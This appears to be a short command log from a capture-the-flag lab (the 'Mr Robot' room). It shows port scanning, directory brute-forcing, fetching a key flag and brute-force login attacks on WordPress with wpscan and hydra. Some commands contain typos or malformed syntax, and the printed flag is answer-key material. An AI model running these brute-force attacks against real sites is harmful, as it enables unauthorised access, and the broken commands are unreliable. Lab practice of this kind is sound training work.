export mrrobot=10.10.177.95
ping $mrrobot
echo "10.10.177.95 mrrobot.thm" >> /etc/hosts
nmap -v -sC -sV -O -T5 -p1-65535 mrrobot.thm
gobuster dir -u mrrobot.thm -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt
curl http://mrrobot.thm/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
curl http://mrrobot.thm/fsocity.dic --output fsocity.dic
wpscan --url http://mrrobot.thm --paswords fsocity.dic --usernames 'elliot'
hydra -L fsocity.dic -p test mrrobot.thm http-post-form "/wp-login/:log=^USER^&pwd=^PASS^wp-submit=Log+In:F=Invalid username"